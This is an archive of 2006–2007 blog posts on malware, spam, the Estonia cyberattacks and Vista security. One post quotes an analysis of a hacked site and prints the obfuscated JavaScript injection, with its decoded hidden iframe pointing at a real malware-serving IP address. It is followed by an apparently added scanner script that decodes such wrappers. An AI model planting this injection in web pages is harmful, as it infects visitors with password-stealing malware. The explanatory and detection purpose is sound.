Archive for the 'Malware' Category

Economist: cyberwar reassessed

Saturday, May 26th, 2007

Good piece pondering the implications of the assault on Estonia.

Even at their crudest, the assaults broke new ground. For the first time, a state faced a frontal, anonymous attack that swamped the websites of banks, ministries, newspapers and broadcasters; that hobbled Estonia’s efforts to make its case abroad. Previous bouts of cyberwarfare have been far more limited by comparison: probing another country’s internet defences, rather as a reconnaissance plane tests air defences.

At full tilt, the onslaught on Estonia was also of a sophistication not seen before, with tactics shifting as weaknesses emerged. “Particular ‘ports’ of particular mission-critical computers in, for example, the telephone exchanges were targeted. Packet ‘bombs’ of hundreds of megabytes in size would be sent first to one address, then another,” says Linnar Viik, Estonia’s top internet guru. Such efforts exceed the skills of individual activists or even organised crime; they require the co-operation of a state and a large telecoms firm, he says. The effects could have been life-threatening. The emergency number used to call ambulances and the fire service was out of action for more than an hour.

For many countries, the events of the past weeks have been a loud wake-up call. Estonia, one of the most wired nations in Europe, actually survived pretty well. Other countries would have fared worse, NATO specialists reckon…

IMHO, this is a really big deal. I can’t understand why governments appear to be paying so little attention to it. And I’m astonished that it has taken so long for an attack to materialise. Years ago I wrote that Saddam Hussein should stop wasting his efforts on WMD and hire some hackers instead. I guess he didn’t read the Observer. Just as well, maybe.

What the attacks on Estonia have taught us about online combat

Wednesday, May 23rd, 2007

Good piece in Slate by Cyrus Farivar…

The Estonia case also shows how easy it is to cause massive panic on a shoestring budget. All you need to deploy a cyberattack is some malicious software, a bunch of zombie computers distributed around the world, and an Internet connection. Sure, you may need to pay for a “professional-grade” botnet—a network of computers that have been surreptitiously infected to run nefarious software. But surely that costs orders of magnitude less than the price of heavy artillery, battleships, and nuclear submarines.

Perhaps the most telling lesson here is how difficult it is to catch the perpetrators of online terrorism. Covering one’s fingerprints and footprints online is relatively simple, compared with getting rid of physical evidence. IP addresses can be spoofed, and an attack that appears to come from one place may actually originate somewhere else. As such, the Kremlin (or anyone else) can plausibly deny that they had anything to do with the attacks, even if the Estonians’ server logs show that the attacks first originated from Moscow. If the Russians don’t want to hand over data or documents—or even pick up the phone, for that matter—there’s not much that Estonia, or anyone else, can do to figure out the real story…

Spam still increasing, but users are less bothered by it

Wednesday, May 23rd, 2007

That just about sums up the latest Pew survey.

The volume of spam is growing in Americans’ personal and workplace email accounts, but email users are less bothered by it.

Spam continues to plague the internet as more Americans than ever say they are getting more spam than in the past. But while American internet users report increasing volumes of spam, they also indicate that they are less bothered by it than before. Users have become more sophisticated about dealing with spam; fully 71% of email users use filters offered by their email provider or employer to block spam. Users also report less exposure to pornographic spam, which to many people is the most offensive type of unsolicited email. Spam has not become a significant deterrent to the use of email, as some observers speculated it might when unsolicited email first began flooding users’ inboxes several years ago. But it continues to degrade the integrity of email. Some 55% of email users say they have lost trust in email because of spam.

Full report here.

The dark side

Saturday, May 12th, 2007

BBC NEWS | Technology | Google searches web’s dark side

One in 10 web pages scrutinised by search giant Google contained malicious code that could infect a user’s PC.

Researchers from the firm surveyed billions of sites, subjecting 4.5 million pages to “in-depth analysis”.

About 450,000 were capable of launching so-called “drive-by downloads”, sites that install malicious code, such as spyware, without a user’s knowledge.

A further 700,000 pages were thought to contain code that could compromise a user’s computer, the team report.

Blog spam

Tuesday, April 10th, 2007

According to this,

A recent study by WebmasterWorld found that an estimated 77% of all blogs on Google’s Blogspot service were spam. Similarly, AOL Hometown had well over 80% of its results turn out to be spam. Even MSN Spaces, which was not mentioned in the report, is claimed to host an estimated ten percent of spammer Web sites.

It seems as if nearly every major free blog hosting service has been either overrun or nearly overrun with spam. However, one service stands alone, a relative oasis of spam cleanliness, Automattic’s Wordpress.com. Despite being just as free as its competitors and placing few restrictions on registration, Wordpress.com has not endured the spam avalanche that other services have.

Though there have been spam attacks in the past, the spammers have been easily shut down and, overall, the service remains relatively free of the splogs that seem to choke up its competitors. Though paid services such as Typepad also enjoy a relatively spam-free existence, what Wordpress.com does is very rare for a free service…

Those numbers are very interesting. Wonder how they affect the Technorati figures about 71 million blogs (as of now) and two new ones being created every second. Also: what is Google doing about the Blogspot problem?

Footnote: Memex runs on Wordpress.

The new malware ecology

Sunday, March 25th, 2007

Ethan Zuckerman has a fascinating story about how contemporary malware works.

It begins with him Googling a friend to find the URL of her home page, only to find that Google wouldn’t connect him to her site and flashed up the warning “This site may harm your computer”. It transpired that this is the result of the StopBadware campaign run by the folks at the Berkman Center; Google identifies sites that it believes are spreading malware and registers them with Stop Badware. If a site has been blacklisted, its owner has the option of protesting and having his/her case reviewed by the Berkman people. Ethan duly protested on his friend’s behalf…

Within half an hour, three of my colleagues pointed me to the source code of my friend’s page. At the top of her index page was a strange-looking piece of Javascript:

<script language="javascript"> document.write( unescape(
'%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68
%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34
%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D
%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D
%22%30%22%20%77%69%64%74%68%3D%22%31%22%20
%68%65%69%67%68%74%3D%22%31%22%20%73%63%72
%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61
%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69
%66%72%61%6D%65%3E'
) ); </script>

That’s some seriously obfuscated Javascript. But if you translate from hexadecimal to ASCII, the code’s pretty clear - it inserts the following code into the top of the HTML page:

<iframe src= http://81.95.146.98/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>

The code opens an “iframe”, an inline frame which allows another web page to be embedded within a page - iframes are pretty useful things, especially for building interactive applications in web pages. But this frame is pretty sinister. It opens a one pixel by one pixel frame which attempts to load the webpage located at http://81.95.146.98/index.html.

That page doesn’t load on my browser - the server is apparently refusing connections, at least from my Macintosh - but it occupies an IP in a block of addresses controlled by a charming bunch of guys who do business as RBusiness Network. Google for them and you’ll mostly find lots of angry message board posts from spamfighters - the RBusiness folks operate a number of servers advertised in spam emails and are suspected of relaying large amounts of spam. Many of the RBusiness-associated webpages are in Russian, though their servers are currently in Panama City, Panama - some antispammers believe that RBusiness is short for “Russian Business Network”, which was evidently their previous operating name.

Googling for the specific IP - 81.95.146.98 - turns up a couple of pages with people documenting an interesting exploit - the Microsoft Data Access Components exploit. Basically, when you load this iframe, it runs a small script which downloads and runs a Windows executable file. That file downloads a rootkit, a password sniffer and opens a backdoor into the user’s system. (Needless to say, this only happens on Microsoft Windows systems running unpatched software… which is to say, many Windows systems.) According to Ivan Macalintal, this iframe was installing code from websites that looked fairly innocuous, including one that promised to help you write your company’s travel policy. (Remarkably, this site is the #1 match for a search for “travel policy” on Google, though Google doesn’t let you click directly to the page, stopping you with a “harm your computer” message.)

It’s possible that this is what my friend’s site was trying to install - Ivan’s report dates from October 2006. It’s also possible that it was trying to install a more recent package of malware - Trojan-PSW.Win32.Small.bs - which Avira saw linked to the 81.95.126.98 domain in early January of this year. This little nasty logs passwords entered on webpages, opens a SOCKS proxy on your machine and calls home to an RBusiness server to let the bad guys know how to take advantage of your new machine to send spams and retrieve your passwords.

So had Ethan’s friend got into bed with these Russian hoodlums? Unlikely.

Simply put, [her site] was hacked. Not content with setting up websites to spread their trojan horses, the RBusiness boys have been breaking into blog and wiki sites and installing this new iframe. In some cases, they’re able to guess default passwords; in other cases, they exploit unpatched bugs in software. I was all ready to go to Berkman yesterday with my tail between my legs and tell my colleagues that my friend’s server had been compromised. But my friends were already dealing with the fact that Google had found malicious iframes on a number of Harvard-affiliated sites, including several blogs hosted on the blogs.law.harvard.edu server! Stop Badware, yesterday at least, was stopping Berkman.

Which is deeply ironic, given what the StopBadware initiative was set up to do. But in a way, it only goes to underscore how complex and dangerous our software monoculture has become.
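The decoding step described in Ethan’s post, as an added example that is neither part of the original post nor Ethan’s own code: it pulls the document.write(unescape(…)) wrapper quoted above out of a constructed page, decodes it the way the browser would, and reports any iframe small enough to be invisible, together with the address it loads. The surrounding page fragment and the helper names are constructed for illustration; the percent-encoded string is the one quoted above.

```javascript
// Added example (not from the original post): recover what a
// document.write(unescape('...')) wrapper injects and flag hidden iframes.

// The percent-encoded string exactly as quoted in the post, reassembled.
const PAYLOAD =
  '%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68' +
  '%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34' +
  '%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D' +
  '%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D' +
  '%22%30%22%20%77%69%64%74%68%3D%22%31%22%20' +
  '%68%65%69%67%68%74%3D%22%31%22%20%73%63%72' +
  '%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61' +
  '%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69' +
  '%66%72%61%6D%65%3E';

// Constructed sample page carrying the same wrapper that sat atop the index page.
const SAMPLE_HTML =
  '<html><head><script language="javascript"> document.write( unescape(\n' +
  "'" + PAYLOAD + "'\n) ); </script></head><body><p>Hello</p></body></html>";

// Pull every unescape('...') argument out of the page and decode it the way
// the browser's unescape() would, so we see what document.write would insert.
function decodeUnescapeCalls(html) {
  const re = /unescape\(\s*(['"])([^'"]*)\1\s*\)/g;
  const decoded = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    decoded.push(unescape(m[2]));
  }
  return decoded;
}

// Parse attr="v", attr='v' and bare attr=v pairs (the decoded tag uses all
// three forms, including a stray space after src=).
function parseAttrs(attrText) {
  const attrRe = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  const attrs = {};
  let m;
  while ((m = attrRe.exec(attrText)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] !== undefined ? m[2] : (m[3] !== undefined ? m[3] : m[4]);
  }
  return attrs;
}

// Report iframes whose box is at most maxPx on each side: a 1x1 frame pulling
// a remote page is the pattern the post describes.
function findHiddenIframes(fragment, maxPx = 2) {
  const tagRe = /<iframe\b([^>]*)>/gi;
  const hits = [];
  let m;
  while ((m = tagRe.exec(fragment)) !== null) {
    const a = parseAttrs(m[1]);
    const w = parseInt(a.width, 10);
    const h = parseInt(a.height, 10);
    if (!Number.isNaN(w) && !Number.isNaN(h) && w <= maxPx && h <= maxPx) {
      hits.push({ src: a.src || '', width: w, height: h });
    }
  }
  return hits;
}

// Decode every wrapper on the page and scan each decoded fragment.
function scanForInjectedIframes(html) {
  return decodeUnescapeCalls(html).flatMap((frag) => findHiddenIframes(frag));
}

console.log(scanForInjectedIframes(SAMPLE_HTML));
```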

Vista flaws begin to emerge

Monday, December 25th, 2006

There’s a certain predictability about this. According to John Markoff in the New York Times…

Microsoft is facing an early crisis of confidence in the quality of its Windows Vista operating system as computer security researchers and hackers have begun to find potentially serious flaws in the system that was released to corporate customers late last month.

On Dec. 15, a Russian programmer posted a description of a flaw that makes it possible to increase a user’s privileges on all of the company’s recent operating systems, including Vista. And over the weekend a Silicon Valley computer security firm said it had notified Microsoft that it had also found that flaw, as well as five other vulnerabilities, including one serious error in the software code underlying the company’s new Internet Explorer 7 browser.

The browser flaw is particularly troubling because it potentially means that Web users could become infected with malicious software simply by visiting a booby-trapped site. That would make it possible for an attacker to inject rogue software into the Vista-based computer, according to executives at Determina, a company based in Redwood City, Calif., that sells software intended to protect against operating system and other vulnerabilities…

Spam 2.0

Wednesday, December 6th, 2006

From today’s New York Times

The antispam industry is struggling to keep up with the surge. It is adding computer power and developing new techniques in an effort to avoid losing the battle with the most sophisticated spammers.

It wasn’t supposed to turn out this way. Three years ago, Bill Gates, Microsoft’s chairman, made an audacious prediction: the problem of junk e-mail, he said, “will be solved by 2006.” And for a time, there were signs that he was going to be proved right.

Antispam software for companies and individuals became increasingly effective, and many computer users were given hope by the federal Can-Spam Act of 2003, which required spam senders to allow recipients to opt out of receiving future messages and prescribed prison terms for violators.

According to the Federal Trade Commission, the volume of spam declined in the first eight months of last year.

But as many technology administrators will testify, the respite was short-lived.

“At the beginning of the year spam was off our radar,” said Franklin Warlick, senior messaging systems administrator at Cox Communications in Atlanta.

“Now employees are stopping us in the halls to ask us if we turned off our spam filter,” Mr. Warlick said.

Mehran Sabbaghian, a network engineer at the Sacramento Web hosting company Lanset America, said that last month a sudden Internet-wide increase in spam clogged his firm’s servers so badly that the delivery of regular e-mail to customers was delayed by hours.

To relieve the pressure, the company took the drastic step of blocking all messages from several countries in Europe, Latin America and Africa, where much of the spam was originating.

This week, Lanset America plans to start accepting incoming mail from those countries again, but Mr. Sabbaghian said the problem of junk e-mail was “now out of control.”

Antispam companies fought the scourge successfully, for a time, with a blend of three filtering strategies. Their software scanned each e-mail and looked at whom the message was coming from, what words it contained and which Web sites it linked to. The new breed of spam — call it Spam 2.0 — poses a serious challenge to each of those three approaches.

Spammers have effectively foiled the first strategy — analyzing the reputation of the sender — by conscripting vast networks of computers belonging to users who unknowingly downloaded viruses and other rogue programs. The infected computers begin sending out spam without the knowledge of their owners. Secure Computing, an antispam company in San Jose, Calif., reports that 250,000 new computers are captured and added to these spam “botnets” each day.

The sudden appearance of new sources of spam makes it more difficult for companies to rely on blacklists of known junk e-mail distributors. Also, by using other people’s computers to scatter their e-mail across the Internet, spammers vastly increase the number of messages they can send out, without having to pay for the data traffic they generate.

“Because they are stealing other people’s computers to send out the bad stuff, their marginal costs are zero,” said Daniel Drucker, a vice president at the antispam company Postini. “The scary part is that the economics are now tilted in their favor.”

The use of botnets to send spam would not matter as much if e-mail filters could still make effective use of the second spam-fighting strategy: analyzing the content of an incoming message. Traditional antispam software examines the words in a text message and, using statistical techniques, determines if the words are more likely to make up a legitimate message or a piece of spam.

The explosion of image spam this year has largely thwarted that approach. Spammers have used images in their messages for years, in most cases to offer a peek at a pornographic Web site, or to illustrate the effectiveness of their miracle drugs. But as more of their text-based messages started being blocked, spammers searched for new methods and realized that putting their words inside the image could frustrate text filtering. The use of other people’s computers to send their bandwidth-hogging e-mail made the tactic practical.

“They moved their message into our blind spot,” said Paul Judge, chief technology officer of Secure Computing…

Allchin recants, er, clarifies

Monday, November 13th, 2006

Further to that earlier post, Jim Allchin has been, er, clarifying his remarks about Vista and anti-virus software.

During a recent discussion with journalists about the release to manufacturing for Windows Vista, I made a comment about how attacks on the Internet are getting more and more sophisticated, and some of the security features in Windows Vista really help our customers. This somehow morphed into people thinking I said customers shouldn’t use antivirus software with Windows Vista.

When the articles and blogs started appearing, I asked the PR folks to send me a copy of the transcript of the call so I could read it over and see if I said something I didn’t mean. After reading the transcript, I could certainly see that what I said wasn’t as clear as it could have been, and I’m sorry for that. However, it is also clear from the transcript that I didn’t say that users shouldn’t run antivirus software with Windows Vista! In fact, later in the call, I explicitly made this point again, because I had realized I wasn’t as clear as I should have been. It’s important for me that our customers are using the appropriate security solutions for the right situations, whether that’s security functionality integrated in the operating systems, or add-on products.

The point I had been trying to make (albeit unclearly) is that Windows Vista includes new security features that can dramatically help improve our customers’ security for certain situations. I was asked a question about how I rated the protection provided by Windows XP with Service Pack 2 and whether or not it was still effective. I ended up telling a story about how the machine my seven-year-old son uses has no antivirus software installed because it runs in a very locked down configuration, which includes only being able to visit websites on an approved list (approved through the parental controls feature in Windows Vista). He also has no access to email or instant messaging and he doesn’t run as an administrator of the machine. In fact, parental controls in Windows Vista requires that the user you apply controls to is not running as an administrator. Email, phishing, and other social engineering attacks are definitely among the most prevalent attacks that home users experience today, and his machine has been locked down in these regards.

My point in bringing up this extreme example was really meant to emphasize the importance of defense-in-depth measures we put in Windows Vista—both the number of defenses and their combined effectiveness.

Now, the comments have unfortunately been cited out of context implying that I said Windows Vista users shouldn’t use antivirus. I want to be clear, most users will use some form of antivirus software, and that will be appropriate for their scenarios. In fact, Windows Security Center, a great feature in Windows Vista, specifically encourages the use of antivirus software.

Hostages to fortune

Sunday, November 12th, 2006

Jim Allchin, Microsoft VP, quoted on Good Morning Silicon Valley, talking about Vista.

In my opinion, it is the most secure system that’s available, and it’s certainly the most secure system that we’ve shipped. So I feel very confident that customers are far better off by using Windows Vista than they are with anything that we’ve released before.

Earlier, he had said that he was so confident in the operating system’s security measures that he believes there’s no need for Vista users to run any third-party antivirus software.

Stay tuned.

LATER… Bill Thompson has written an insightful column about this. Excerpt:

Vista will ship with Kernel Patch Protection - also called PatchGuard - which checks to see if the core has been altered in any way. This should make it a lot harder for viruses, trojans, rootkits and other types of malicious software, or malware, to install.

PatchGuard will be backed up by support for the Trusted Platform Module, a hardware component built into many new computers that gives the operating system a way to store and use secured information.

The new approach should make life more difficult for malware writers, but it is also going to get in the way of legitimate security software vendors such as Symantec, which has already pointed out that its anti-virus programs rely on being able to modify the Windows kernel, something which will no longer be allowed.

Microsoft’s response is to argue that “kernel patching”, as the process is called, is not needed and that the standard security tools are all that are required.

It may be right, but it’s hard to tell because we don’t actually know much about what is going on inside the Vista kernel. Microsoft, like many other commercial software developers, prefers to keep such details secret.

“If severe flaws are discovered in Vista”, Bill concludes, “and there are already signs that the lockdown is far from perfect, then users may well wonder why they have put their faith in the ‘benign dictator’ approach to security.”